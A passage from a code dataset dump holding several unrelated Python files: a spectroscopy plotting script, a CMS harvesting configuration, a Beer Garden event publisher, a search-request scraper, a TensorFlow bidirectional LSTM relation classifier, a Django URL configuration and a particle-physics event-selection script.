calibration\nfile_name=r'Ne_MidFreq_65K_60s_20150525_132004_wavenumber.cal'\nfile_path=file_path=folder_path+os.path.sep+file_name\ncache=np.genfromtxt(file_path)\ncal_wavenumber=cache\n\n# data\ndata_file_name=r'MAPbCl3_CU_MidFreq.txt'\nfile_path=folder_path+os.path.sep+data_file_name\ndf=pd.read_table(file_path,sep='\\t',header=0)\n\n# fix row name\ndf.index=cal_wavenumber\n# fix column name\ndf.columns=[int(item.split('K')[0]) for item in df.columns.tolist()]\n# reorder columns\ndf=df.sort_index(axis=1,ascending=True)\n\n# data clean up\nnum_row,num_col=df.shape\ndf=df-dark_count\n#ind=(df.index>-10)&(df.index<10)\n#df=df.drop(df.index[ind])\n#df_normd=df.iloc[260:,:]\n\ngrp=df.groupby(df.columns,axis=1)\ndf=grp.mean()\n\ndf_normd=df/df.max()\n\nind=df.index<600\ndf_300=df.loc[ind,:]\ndf_300=df_300/df_300.max()\n\nind=(df.index>900)&(df.index<1000)\ndf_900=df.loc[ind,:]\ndf_900=df_900/df_900.max()\n\n\nlib_path=r'C:\\Users\\YinshengGuo\\WinPython-64bit-2.7.9.1\\yinshengguo_codes'\nsys.path.append(lib_path)\nfrom util_plotting import plot_df_1d,plot_df_2d\n#==============================================================================\n# plot as series of 1D spectrum with offset\nfig1,ax1=plt.subplots(nrows=1,ncols=2,figsize=(8,6))\nplot_df_1d(df_300,ax1[0],label_loc=None)\nplot_df_1d(df_900,ax1[1],label_loc='right')\nfig1.suptitle(data_file_name,fontweight='bold',fontsize=24)\n#==============================================================================\n\n#==============================================================================\n# 2D color plots\nfig2,ax2=plt.subplots(nrows=1,ncols=2,figsize=(8,6))\nplot_df_2d(df_300,ax2[0])\nplot_df_2d(df_900,ax2[1])\nfig2.suptitle(data_file_name,fontweight='bold')\n#==============================================================================\n","sub_path":"data_crunching_T_20150525.py","file_name":"data_crunching_T_20150525.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"384750502","text":"import FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\n\nprocess = cms.Process('HARVESTING')\n\n# import of standard configurations\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.EventContent.EventContent_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')\nprocess.load('Configuration.StandardSequences.EDMtoMEAtRunEnd_cff')\nprocess.load('Configuration.StandardSequences.Harvesting_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.configurationMetadata = cms.untracked.PSet(\n version = cms.untracked.string(': 1.1 $'),\n annotation = cms.untracked.string('harvest nevts:100'),\n name = cms.untracked.string('PyReleaseValidation')\n)\nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(-1)\n)\nprocess.options = cms.untracked.PSet(\n Rethrow = cms.untracked.vstring('ProductNotFound'),\n fileMode = cms.untracked.string('FULLMERGE')\n)\n\n# Input source\nprocess.source = cms.Source(\"DQMRootSource\",\n fileNames = cms.untracked.vstring('file:dummyfile.root')\n)\n\n# Other statements\nfrom Configuration.AlCa.GlobalTag import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc_GRun', 
'')\n\n# Path and EndPath definitions\nprocess.edmtome_step = cms.Path(process.EDMtoME)\nprocess.validationpreprodHarvesting = cms.Path(process.postValidation*process.hltpostvalidation_preprod)\nprocess.validationprodHarvesting = cms.Path(process.postValidation*process.hltpostvalidation_prod)\nprocess.dqmHarvesting = cms.Path(process.DQMOffline_SecondStep*process.DQMOffline_Certification)\nprocess.validationHarvesting = cms.Path(process.postValidation*process.hltpostvalidation)\n#process.validationHarvestingFS = cms.Path(process.HarvestingFastSim)\nprocess.dqmHarvestingPOG = cms.Path(process.DQMOffline_SecondStep_PrePOG)\nprocess.dqmsave_step = cms.Path(process.DQMSaver)\n\n# Schedule definition \nprocess.schedule = cms.Schedule(process.edmtome_step,process.dqmHarvesting,process.dqmsave_step) \n #----------------------------------------------------------------------------------- \n# Mark's changes start (everything above this point is the output from cmsDriver) \n# \n\n# For some reason a seed harvester isn't included in the standard sequences. If this next processor isn't \n# run then things like efficiencies are just added together instead of recalculated. \nprocess.dqmSaver.saveAtJobEnd = cms.untracked.bool(True)\n#process.dqmSaver.workflow = \"/G4e/RelVal/Validation\"\n#process.dqmSaver.forceRunNumber = cms.untracked.int32(1)\n\nimport FWCore.ParameterSet.Config as cms\nfrom Validation.RecoVertex.HLTpostProcessorVertex_cfi import *\n\nprocess.load('Validation.RecoTrack.HLTpostProcessorTracker_cfi')\nprocess.postProcessorHLTtrackingSequence = cms.Sequence(process.postProcessorHLTtracking+process.postProcessorHLTtrackingSummary)\n\nfrom DQM.TrackingMonitorClient.TrackingEffFromHitPatternClientConfig_cff import *\nprocess.trackingEffFromHitPatternHLT = trackingEffFromHitPattern.clone()\nprocess.trackingEffFromHitPatternHLT.subDirs = cms.untracked.vstring(\n \"HLT/Tracking/pixelTracks/HitEffFromHitPattern\",\n \"HLT/Tracking/iter0/HitEffFromHitPattern\",\n \"HLT/Tracking/iter0HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter1/HitEffFromHitPattern\",\n \"HLT/Tracking/iter1HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter2/HitEffFromHitPattern\",\n \"HLT/Tracking/iter2HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter2Merged/HitEffFromHitPattern\",\n \"HLT/Tracking/iter3HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter3Merged/HitEffFromHitPattern\",\n \"HLT/Tracking/iter4/HitEffFromHitPattern\",\n \"HLT/Tracking/iter4HP/HitEffFromHitPattern\",\n \"HLT/Tracking/iter4Merged/HitEffFromHitPattern\"\n)\n# Remove the HLT harvesting from the validation harvesting step \nprocess.validationHarvesting = cms.Path(process.postValidation)\nprocess.trackingOnlyHarvesting = cms.Path(process.postProcessorHLTtrackingSequence)\nprocess.trackingEffFromHitHarvesting = cms.Path(process.trackingEffFromHitPatternHLT)\nprocess.vertexingHarvesting = cms.Path(process.postProcessorHLTvertexing)\nprocess.schedule = cms.Schedule(process.edmtome_step,\n process.trackingOnlyHarvesting,\n process.trackingEffFromHitHarvesting,\n process.vertexingHarvesting,\n process.dqmsave_step)\n\nfiles = cms.untracked.vstring() \nfiles = [ \n'file:DQMIO.root'\n] \nprocess.source.fileNames = files \n","sub_path":"Harvesting_cfg.py","file_name":"Harvesting_cfg.py","file_ext":"py","file_size_in_byte":5393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255742816","text":"# -*- coding: utf-8 -*-\nimport logging\n\nfrom brewtils.schema_parser import SchemaParser\n\nimport 
beer_garden.api.http\nfrom beer_garden.api.http.handlers.v1.event import EventSocket\n\nlogger = logging.getLogger(__name__)\n\n\nclass EventManager:\n \"\"\"Will simply push events across the connection to the master process\"\"\"\n\n def __init__(self, conn):\n self._conn = conn\n\n def put(self, event):\n beer_garden.api.http.io_loop.add_callback(self._conn.send, event)\n\n\ndef websocket_publish(item):\n \"\"\"Will serialize an event and publish it to all event websocket endpoints\"\"\"\n try:\n beer_garden.api.http.io_loop.add_callback(\n EventSocket.publish, SchemaParser.serialize(item, to_string=True)\n )\n except Exception as ex:\n logger.exception(f\"Error publishing event to websocket: {ex}\")\n","sub_path":"src/app/beer_garden/api/http/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"452724894","text":"#!/usr/bin/env python3\n# __coding__ : utf-8\n# __author__ : YiXuan\n# __date__ : 10/7/2020 10:38 PM\n# __software__ : PyCharm\n\nimport requests\n\n\nif __name__ == '__main__':\n # url = 'https://www.baidu.com/s'\n url = 'https://www.sogou.com/web'\n kw = input('Please Enter A Key Word:')\n param = {\n # 'wd': kw\n 'query':kw\n }\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36',\n }\n response = requests.get(url=url, params=param, headers=headers)\n response.encoding = 'utf-8'\n page_text = response.text\n print(page_text)\n\n","sub_path":"Crawler/Course/第一章:爬虫基础简介/02.searchEngine.py","file_name":"02.searchEngine.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"152737023","text":"import os\nimport numpy as np\nimport tensorflow as tf\nimport pickle\nimport re\n\nconfig = tf.ConfigProto(allow_soft_placement = True)\nconfig.gpu_options.allow_growth = True\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.5\n\nclass DataFormater(object):\n def __init__(self):\n self.embeddingArr = None\n self.wordNum = None\n self.wordIndDict = None\n self.wordSet = None\n self.ySet = None\n self.yNum = None\n self.yIndDict = None\n self.trainXList = None\n self.trainYList = None\n self.trainXQList = None\n self.maxSeqLen = None\n self.testXList = None\n self.testYList = None\n self.testXQList = None\n self.tesSeqLenList = None\n self.trainXArr = None\n self.trainYArr = None\n self.trainXQArr = None\n self.testXArr = None\n self.testYArr = None\n self.testXQArr = None\n self.testSeqLenArr = None\n self.seqLenList = None\n self.seqLenArr = None\n self.embedDim = None\n self.indToYDict = None\n\n def loadEmbedTable(self, fileName):\n wordList = []\n embeddingList = []\n \n with open(fileName) as inFile:\n for line in inFile:\n lineList = line.rstrip().split(' ')\n wordList += [lineList[0]]\n embeddingList += [[float(x) for x in lineList[1:]]]\n \n embeddingList += [[0.0] * len(embeddingList[0])]\n \n self.embedDim = len(embeddingList[0])\n self.embeddingArr = np.array(embeddingList, dtype = np.float64)\n self.wordNum = len(wordList)\n self.wordIndDict = {wordList[ind]: ind for ind in range(self.wordNum)}\n self.wordSet = set(list(self.wordIndDict.keys()))\n\n def loadTestData(self, xFileName, yFileName):\n self.testXList = []\n self.testXQList = []\n self.testSeqLenList = []\n self.testYList = []\n\n with open(xFileName) as inFile:\n for line in inFile:\n wordList 
= re.findall(r\"[\\w<>/]+|[.,!?;]\", line.rstrip().split('\\t')[1][1:-1])\n length = len(wordList)\n self.testSeqLenList += [length]\n \n qList = []\n for wordInd in range(len(wordList)):\n word = wordList[wordInd]\n if word.startswith('<') and word.endswith('>'):\n wordList[wordInd] = word[4:-5]\n qList += [wordInd]\n elif word.endswith('>'):\n wordList[wordInd] = word[:-5]\n qList += [wordInd]\n elif word.startswith('<'):\n wordList[wordInd] = word[4:]\n \n self.testXList += [np.array(wordList)]\n self.testXQList += [qList]\n \n with open(yFileName) as inFile:\n for line in inFile:\n self.testYList += [[line.rstrip().split('\\t')[1]]]\n\n print ('maxSeqLen for test data: ', max([len(x) for x in self.testXList]))\n\n def loadTrainData(self, fileName):\n self.trainXList = []\n self.trainYList = []\n self.trainXQList = []\n self.seqLenList = []\n \n with open(fileName) as inFile:\n lineState = 0\n for line in inFile:\n if lineState == 0:\n wordList = re.findall(r\"[\\w<>/]+|[.,!?;]\", line.rstrip().split('\\t')[1][1:-1])\n length = len(wordList)\n self.seqLenList += [length]\n \n qList = []\n for wordInd in range(len(wordList)):\n word = wordList[wordInd]\n if word.startswith('<') and word.endswith('>'):\n wordList[wordInd] = word[4:-5]\n qList += [wordInd]\n elif word.endswith('>'):\n wordList[wordInd] = word[:-5]\n qList += [wordInd]\n elif word.startswith('<'):\n wordList[wordInd] = word[4:]\n\n self.trainXList += [np.array(wordList)]\n self.trainXQList += [qList]\n\n elif lineState == 1:\n self.trainYList += [[line.rstrip()]]\n\n lineState = (lineState + 1) % 4\n\n self.ySet = set([x[0] for x in self.trainYList])\n self.yNum = len(self.ySet)\n yList = list(self.ySet)\n self.yIndDict = {yList[ind]: ind for ind in range(self.yNum)}\n self.indToYDict = {v: k for k, v in self.yIndDict.items()}\n\n def tokenToInd(self):\n self.maxSeqLen = max([len(x) for x in self.trainXList])\n self.trainXArr = np.array([[self.wordIndDict.get(word, self.wordNum) for word in x] + [self.wordNum] * (self.maxSeqLen - len(x)) for x in self.trainXList])\n self.trainYArr = np.array([[self.yIndDict[y[0]]] for y in self.trainYList])\n self.trainXQArr = np.array(self.trainXQList)\n self.seqLenArr = np.array(self.seqLenList)\n print ('shape of trainXQArr: ', self.trainXQArr.shape)\n\n self.testXArr = np.array([[self.wordIndDict.get(word, self.wordNum) for word in x] + [self.wordNum] * (self.maxSeqLen - len(x)) for x in self.testXList])\n self.testYArr = np.array([[self.yIndDict[y[0]]] for y in self.testYList])\n self.testXQArr = np.array(self.testXQList)\n self.testSeqLenArr = np.array(self.testSeqLenList)\n\n def saveEmbedTable(self, fileName):\n with open(fileName, 'wb') as inFile:\n pickle.dump(self.embeddingArr, inFile)\n print ('embeddingArr is saved as %s' % fileName)\n\n def loadEmbedTableFile(self, fileName):\n with open(fileName, 'rb') as outFile:\n self.embeddingArr = pickle.load(outFile)\n\nclass BiDirRnnModel():\n def __init__(self):\n self.inputXPH = None\n self.inputYPH = None\n self.inputSeqLenPH = None\n self.inputXQPH = None\n self.loss = None\n\n def buildModel(self, embedDim, seqLen, yNum, wtStddev, biasStddev, embedTable, rnnHiddenDim, useRnnOutput, fcNum):\n\n with tf.name_scope('input_PH'):\n\n self.inputXPH = tf.placeholder('int32', [None, seqLen])\n self.inputYPH = tf.placeholder('int32', [None, 1])\n self.inputSeqLenPH = tf.placeholder('int32', [None])\n self.inputXQPH = tf.placeholder('int32', [None, 2])\n self.dropKeepProPH = tf.placeholder_with_default(1.0, shape = [])\n\n with 
tf.name_scope('embedding'):\n\n embedTable = tf.constant(embedTable, dtype = tf.float64)\n embeddedSeqPH = tf.nn.embedding_lookup(embedTable, self.inputXPH)\n qPH = tf.transpose(tf.one_hot(self.inputXQPH, seqLen, dtype = 'float64'), perm = [0, 2, 1])\n print ('qPH: ', qPH.shape)\n fullEmbeddedSeqPH = tf.concat([embeddedSeqPH, qPH], axis = 2)\n print ('fullEmbeddedSeqPH: ', fullEmbeddedSeqPH.shape)\n\n with tf.name_scope('bi-directional_rnn'):\n\n fwLstmCell = tf.nn.rnn_cell.BasicLSTMCell(rnnHiddenDim, state_is_tuple = False)\n bwLstmCell = tf.nn.rnn_cell.BasicLSTMCell(rnnHiddenDim, state_is_tuple = False)\n\n tupTup=tf.nn.bidirectional_dynamic_rnn(fwLstmCell, bwLstmCell, fullEmbeddedSeqPH, self.inputSeqLenPH, dtype='float64')\n (fwOutput, bwOutput), (fwState, bwState) = tupTup\n biOutput = tf.concat([fwOutput, bwOutput], axis = 2)\n biState = tf.concat([fwState, bwState], axis = 1)\n #print ('shape of fwState, bwState: ', fwState.get_shape(), bwState.get_shape())\n print ('shape of biOutput: ', biOutput.get_shape())\n print ('shape of biState: ', biState.get_shape())\n\n if useRnnOutput:\n\n batchSize = tf.shape(self.inputXPH)[0]\n rangePH = tf.range(batchSize, dtype = 'int32')\n indicesPHPre = tf.tile(tf.expand_dims(tf.expand_dims(rangePH, axis = 1), axis = 2), multiples = [1, 2, 1])\n indicesPH = tf.concat([indicesPHPre, tf.expand_dims(self.inputXQPH, axis = 2)], axis = 2)\n qBiOutput = tf.gather_nd(biOutput, indicesPH)\n \n qSh = qBiOutput.get_shape()\n fcInPH = tf.concat([biState, tf.reshape(qBiOutput, [-1, qSh[1] * qSh[2]])], axis = 1)\n\n else:\n fcInPH = biState\n\n with tf.name_scope('fully_connected_layer'):\n\n inNodeNum = 8 * rnnHiddenDim if useRnnOutput else 4 * rnnHiddenDim\n nodeNumList = self.getNodeNumList(inNodeNum, yNum, fcNum)\n \n for layerInd in range(fcNum):\n fcInPH = tf.nn.dropout(fcInPH, keep_prob = tf.cast(self.dropKeepProPH, 'float64')) if layerInd != 0 else fcInPH\n fcInPH = self.fcLayer(fcInPH, nodeNumList[layerInd], wtStddev, biasStddev)\n if layerInd != fcNum-1:\n fcInPH = tf.nn.relu(fcInPH)\n outputPH = fcInPH\n\n self.predY = tf.argmax(outputPH, axis = 1)\n lossPre = tf.nn.softmax_cross_entropy_with_logits(labels = tf.one_hot(self.inputYPH, yNum), logits = outputPH)\n self.loss = tf.reduce_sum(lossPre)\n\n def trainModel(self, epochNum, learningRate, trainXArr, trainYArr, trainXQArr, seqLenArr, testXArr, testYArr, testXQArr, testSeqLenArr, indToYDict, outputFileName, batchSize, dropKeepPro):\n\n print ('fileName: ', outputFileName)\n\n optimizer = tf.train.AdamOptimizer(learning_rate = learningRate).minimize(self.loss)\n feedDict = {self.inputXPH: trainXArr, self.inputYPH: trainYArr, self.inputXQPH: trainXQArr, self.inputSeqLenPH: seqLenArr}\n testFeedDict = {self.inputXPH:testXArr,self.inputYPH:testYArr,self.inputXQPH:testXQArr,self.inputSeqLenPH:testSeqLenArr}\n batchNum = len(trainXArr) // batchSize\n\n with tf.Session(config = config) as sess:\n sess.run(tf.global_variables_initializer())\n for epochInd in range(epochNum):\n print ('training epoch %d...' 
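The `tf.gather_nd` construction above extracts, for every example in the batch, the RNN outputs at the two entity-marker positions: `indicesPH` pairs each batch index with its two question positions. The indexing is easier to see in numpy (a shape-only illustration of the same gather, not the TF graph):

```python
import numpy as np

batch, seq_len, hidden = 2, 6, 4
out = np.arange(batch * seq_len * hidden).reshape(batch, seq_len, hidden)
q_pos = np.array([[1, 4],    # marker positions for example 0
                  [0, 3]])   # marker positions for example 1

# Equivalent of tf.gather_nd(biOutput, indicesPH) above:
rows = np.arange(batch)[:, None]   # shape (2, 1), broadcasts to (2, 2)
picked = out[rows, q_pos]          # shape (2, 2, 4)
print(picked.shape)                             # (2, 2, 4)
print(np.array_equal(picked[0, 1], out[0, 4]))  # True
```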
% epochInd)\n feedDict = self.shuffleDict(feedDict)\n\n for batchInd in range(batchNum):\n batchFeedDict = self.getBatch(feedDict, batchSize, batchInd * batchSize)\n batchFeedDict[self.dropKeepProPH] = dropKeepPro\n sess.run(optimizer, feed_dict = batchFeedDict)\n \n print ('loss: ', sess.run(self.loss, feed_dict = feedDict))\n print ('training accuracy: ', self.getAcc(sess, feedDict))\n print ('testing accuracy: ', self.getAcc(sess, testFeedDict))\n\n self.outputAns(sess, outputFileName, indToYDict, testFeedDict, 8001)\n\n def outputAns(self, sess, fileName, indToYDict, feedDict, startNum):\n predY = sess.run(self.predY, feed_dict = feedDict)\n with open(fileName, 'w') as outFile:\n for ind in range(len(predY)):\n outFile.write(str(startNum + ind) + '\\t' + indToYDict[predY[ind]] + '\\n')\n print ('output saved as ', fileName)\n\n def getAcc(self, sess, feedDict):\n predY = sess.run(self.predY, feed_dict = feedDict)\n return np.mean(np.equal(predY, np.squeeze(feedDict[self.inputYPH])))\n\n def shuffleDict(self, inDict):\n aKey = list(inDict.keys())[0]\n permutation = np.random.permutation(len(inDict[aKey]))\n return {k: v[permutation] for k, v in inDict.items()}\n\n def getBatch(self, inDict, batchSize, startInd):\n return {k: v[startInd: startInd + batchSize] for k, v in inDict.items()}\n\n def fcLayer(self, inPH, outDim, wtStddev, biasStddev):\n inDim = tf.cast(inPH.shape[1], tf.int32)\n wt = tf.Variable(tf.random_normal([inDim, outDim], stddev = wtStddev, dtype = 'float64'), dtype = 'float64')\n bias = tf.Variable(tf.random_normal([outDim], stddev = biasStddev, dtype = 'float64'), dtype = 'float64')\n \n return tf.matmul(inPH, wt) + bias\n\n def getNodeNumList(self, inDim, outDim, layerNum):\n upList = [inDim]\n downList = [outDim]\n for layerInd in range(layerNum-1):\n if upList[-1] * 1.5 < downList[-1] * 2:\n upList += [upList[-1] * 1.5]\n else:\n downList += [downList[-1] * 2]\n return upList[1:] + downList[::-1]\n\nif __name__ == '__main__':\n df = DataFormater()\n df.loadEmbedTableFile('embedTable.pkl')\n df.loadEmbedTable('glove/glove.6B.50d.txt')\n df.loadTrainData('TRAIN_FILE.txt')\n df.loadTestData('TEST_FILE.txt', 'answer_key.txt')\n df.tokenToInd()\n #df.saveEmbedTable('embedTable.pkl')\n\n bdmd = BiDirRnnModel()\n bdmd.buildModel(embedDim = df.embedDim, seqLen = df.maxSeqLen, yNum = df.yNum, wtStddev = 0.1, biasStddev = 0.01, embedTable = df.embeddingArr, rnnHiddenDim = 8, useRnnOutput = True, fcNum = 1)\n bdmd.trainModel(epochNum = 100, learningRate = 0.001, trainXArr = df.trainXArr, trainYArr = df.trainYArr, trainXQArr = df.trainXQArr, seqLenArr = df.seqLenArr, testXArr = df.testXArr, testYArr = df.testYArr, testXQArr = df.testXQArr, testSeqLenArr = df.testSeqLenArr, indToYDict = df.indToYDict, outputFileName = 'answer_hid8_useOutput_fc1_drop1.0.txt', batchSize = 128, dropKeepPro = 1.0)\n","sub_path":"bi-directional_LSTM_position_labeled/bi-directional_LSTM_model.py","file_name":"bi-directional_LSTM_model.py","file_ext":"py","file_size_in_byte":13356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297912424","text":"from django.conf.urls import patterns, include, url\nfrom testex.views import *\nfrom testex.search1 import *\nfrom testex.visual import *\nfrom django.contrib import admin\nfrom testex import *\nadmin.autodiscover()\n\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'testex.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^admin/', include(admin.site.urls)),\n 
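The `shuffleDict`/`getBatch` helpers in the model above apply one permutation to every array in the feed dict and then slice consecutive windows, dropping the remainder just as `batchNum = len(trainXArr) // batchSize` does. The same pattern as a single generator (a sketch, not part of either original file):

```python
import numpy as np

# One permutation is applied to every array in the feed dict, then
# consecutive slices are yielded as mini-batches; the tail remainder
# is dropped, matching the integer-division batch count above.
def iterate_minibatches(feed, batch_size, rng=np.random):
    n = len(next(iter(feed.values())))
    order = rng.permutation(n)
    shuffled = {k: v[order] for k, v in feed.items()}
    for start in range(0, n - batch_size + 1, batch_size):
        yield {k: v[start:start + batch_size] for k, v in shuffled.items()}

# Usage with toy arrays standing in for the placeholders:
feed = {"x": np.arange(10), "y": np.arange(10) * 2}
for batch in iterate_minibatches(feed, 4):
    print(batch["x"], batch["y"])
```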
url(r'^hello/$', \"testex.views.hello\"), \n url(r'^hello1/$', \"testex.views.current_datetime1\"),\n url(r'^time/plus/(\\d{1,2})/$', hours_ahead),\t\n url(r'^$', \"testex.views.temp\"),\n url(r'^x/$', \"testex.views.search_form\"),\n url(r'^search/', \"testex.views.search\"),\n url(r'^search_data/', \"testex.search1.search_d\"), \n url(r'^search_new/', \"testex.search1.search_new\"), \t\n url(r'^page1/', \"testex.visual.page1\"),\n url(r'stdenrolled', \"testex.visual.stdenrolled\"),\n url(r'^visualization/', \"testex.visual.visual\"), \n url(r'^visualization/page1', \"testex.visual.page1\"),\n url(r'^visual/check', \"testex.visual.check\"), \n url(r'^v1', \"testex.visual.v1\"), \n url(r'^ch', \"testex.automater.ch\"), \n url(r'^loading/', \"testex.visual.load\"),\n url(r'^submit1/', \"testex.visual.submit1\"), \n url(r'^js1/', \"testex.visual.js1\"),\n url(r'^js2/', \"testex.visual.js2\"),\n url(r'^js3/', \"testex.visual.js3\"),\n url(r'^js4/', \"testex.visual.js4\"),\n url(r'^js5/', \"testex.visual.js5\"),\n url(r'^js6/', \"testex.visual.js6\"),\n url(r'^js7/', \"testex.visual.js7\"),\n url(r'^js8/', \"testex.visual.js8\"),\n url(r'^js9/', \"testex.visual.js9\"),\n url(r'^js10/', \"testex.visual.js10\"),\n url(r'^js11/', \"testex.visual.js11\"),\n #url(r'^print_status', \"testex.visual.print_status\"), \n #url(r'^automater/', \"testex.automater.main\"), \n url(r'visual/graphs/', \"testex.visual.graphs\"), \n url(r'visual/task_in_progress/', \"testex.visual.task_in_progress\"),\n url(r'^django-rq/', include('django_rq.urls')), \t\n url(r'visual/load/', \"testex.automater.load\"),\n url(r'^automater/r/', \"testex.automater.r\"),\n url(r'print_status/', \"testex.automater.print_status\"), \n url(r'^success/','testex.t.success'),\n url(r'^say_hello/','testex.t.say_hello'),\n# url(r'^rp/','testex.rp.rp'),\n\n)\n","sub_path":"django/testex/testex/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"550567185","text":"#Cuts data loosely to prepare for NN.\n\nimport numpy as np\nimport sys \nimport uproot\nimport pandas as pd\nimport LorentzVector as LV\n\n\n#Run over one set at a time, either W,Z, 700, or 800 \nif (sys.argv[1] != 'W' and sys.argv[1] != 'Z' and sys.argv[1] != 'Signal700' and sys.argv[1] != 'Signal800'):\n raise Exception('Bad argument')\nif (sys.argv[1] == 'Signal700'):\n imported = uproot.open('Signal.root')['SS_700_695_NoSys']\nelif (sys.argv[1] == 'Signal800'):\n imported = uproot.open('Signal.root')['SS_800_795_NoSys']\nelse:\n imported = uproot.open(sys.argv[1]+'jets_split/'+sys.argv[1] + 'jets_' + sys.argv[2]+'.root')['nominal']\n \n#Put all variables we want to use here\nUsedData = imported.arrays(['jet_n','jet_pt','el_n','mu_n','met','met_phi', 'baselineLep_n','jet_eta','jet_phi','jet_m','event_weight'])\n\n\n#Function to take care of different size arrays in array (pTs). 
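A note on the `urls.py` above: it targets Django 1.9 and earlier, since `patterns()` and dotted-string view references were removed in Django 1.10. A hedged sketch of the modern equivalent for a few of the routes, assuming the named views exist as importable callables in the modules the original file points at:

```python
# Hypothetical modernization of a few routes above for Django >= 2.0:
# patterns() is gone, views are passed as callables, and path()/re_path()
# replace url(). Module and view names are taken from the original file.
from django.urls import path, re_path, include
from django.contrib import admin
from testex import views, search1, visual

urlpatterns = [
    path('admin/', admin.site.urls),
    path('hello/', views.hello),
    re_path(r'^time/plus/(\d{1,2})/$', views.hours_ahead),
    path('', views.temp),
    path('search/', views.search),
    path('search_data/', search1.search_d),
    path('page1/', visual.page1),
    path('django-rq/', include('django_rq.urls')),
]
```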
All will be same length (based on event with most jets), with zeros in end if space left over\ndef JaggedFixer(array, array_n):\n new_array = np.zeros([array.size, array_n.max()])\n for i in range(len(array)):\n if (array[i].size!=0):\n new_array[i][:array[i].size] = array[i]\n return new_array\n\n#Change this function based on what data we are using\ndef preprocess(DataDict):\n \n processed = {}\n processed['met_phi'] = DataDict[b'met_phi']\n \n processed['jet_n'] = DataDict[b'jet_n']\n tempPT = JaggedFixer(DataDict[b'jet_pt'],DataDict[b'jet_n'])\n processed['jet1_pt'] = tempPT[:,0] #momenta of 1st jet, 0 if no jets\n processed['jet2_pt'] = tempPT[:,1] #momenta of 2nd jet, 0 if no 2nd jet\n processed['jet3_pt'] = tempPT[:,2] #same\n \n tempEta = JaggedFixer(DataDict[b'jet_eta'],DataDict[b'jet_n'])\n processed['jet1_eta'] = tempEta[:,0] #eta of 1st jet, 0 if no jets\n processed['jet2_eta'] = tempEta[:,1]\n \n tempPhi = JaggedFixer(DataDict[b'jet_phi'],DataDict[b'jet_n'])\n processed['jet1_phi'] = tempPhi[:,0] #phi of 1st jet, 0 if no jets\n processed['jet2_phi'] = tempPhi[:,1]\n \n tempM = JaggedFixer(DataDict[b'jet_m'],DataDict[b'jet_n'])\n processed['jet1_m'] = tempM[:,0] #mass of 1st jet, 0 if no jets\n processed['jet2_m'] = tempM[:,1]\n \n processed['HT'] = DataDict[b'jet_pt'].sum() #Scalar sum of jet_pt's, known has HT\n processed['met'] = DataDict[b'met']\n processed[\"Is_Signal\"] = ((DataDict[b'jet_n']>=0) & ((sys.argv[1] == 'Signal700') or (sys.argv[1] == 'Signal800'))).astype('float') #0 if BG, 1 if signal\n processed['event_weight'] = DataDict[b'event_weight']\n \n return processed\n\n#Variables we're actually dealing with after prep\nVariables = ['jet_n','HT','jet1_pt','jet2_pt','jet3_pt','met','met_phi','jet1_eta','jet2_eta','jet1_phi','jet2_phi','jet1_m','jet2_m','Is_Signal','event_weight'] \nProcessedData = preprocess(UsedData)\n#At this point, have a dict with all data-variables as keys and good arrays as values.\n\n#Choose cuts we want to enforce, create array of indices of events that fall outside of cut \nremovedIndeces = []\nfor i in range(len(UsedData[b'mu_n'])):\n if (UsedData[b'mu_n'][i] != 0 or UsedData[b'el_n'][i] != 0 or UsedData[b'baselineLep_n'][i]!=0 or ProcessedData['jet_n'][i]<1 or ProcessedData['met'][i]<110): #or ProcessedData['jet1_pt'][i]>1450 or ProcessedData['jet2_pt'][i]>600):\n \tremovedIndeces.append(i)\n\ndef CutData(ProcessedData, removedIndeces, Variables):\n \n CutData = {}\n for i in Variables:\n \tCutData[i] = np.delete(ProcessedData[i],removedIndeces,None)\n return CutData\n\nCutDataDict = CutData(ProcessedData, removedIndeces, Variables)\n#Now we have a dictionary with the non-wanted data cut out. But still want HT_sig and other dependencies (that could be zero b4)\n#This function adds HT_sig etc. 
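`JaggedFixer` above pads per-event jagged arrays into one rectangle with a Python loop. A vectorized sketch of the same zero-padding (names and toy values are illustrative):

```python
import numpy as np

# Vectorized equivalent of JaggedFixer: pad a list of variable-length
# arrays into one rectangular array, zero-filled on the right.
def pad_jagged(rows, width=None):
    width = width or max(len(r) for r in rows)
    out = np.zeros((len(rows), width))
    mask = np.arange(width) < np.array([len(r) for r in rows])[:, None]
    out[mask] = np.concatenate(rows)   # row-major fill matches the mask order
    return out

jets = [np.array([50.0, 30.0]), np.array([120.0]), np.array([])]
print(pad_jagged(jets))
# [[ 50.  30.]
#  [120.   0.]
#  [  0.   0.]]
```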
